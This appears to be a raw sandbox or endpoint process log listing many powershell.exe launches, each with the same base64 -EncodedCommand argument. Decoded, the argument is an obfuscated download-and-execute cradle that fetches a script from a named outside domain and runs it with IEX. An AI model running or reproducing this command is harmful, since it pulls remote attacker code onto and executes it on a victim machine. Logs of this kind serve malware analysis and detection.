"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
164
4272
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
165
2116
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
166
6148
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
167
6172
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
168
6228
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
169
6292
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
170
6312
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
171
6340
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
172
6376
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
173
6456
powershell.exe
3324
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
174
6464
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
175
6508
powershell.exe
2736
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
176
6564
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
177
6696
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
178
6772
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
179
6856
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Opened
Opened
Process
180
6912
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
181
6960
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
182
7008
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
183
7052
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Opened
Opened
Process
184
7084
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
245
8480
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
246
8608
powershell.exe
4832
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
247
8652
powershell.exe
4428
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
248
8680
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
249
8872
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
250
8924
powershell.exe
4576
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
251
8940
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
252
8988
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
253
9016
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
254
9060
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
255
9124
powershell.exe
2880
powershell.exe
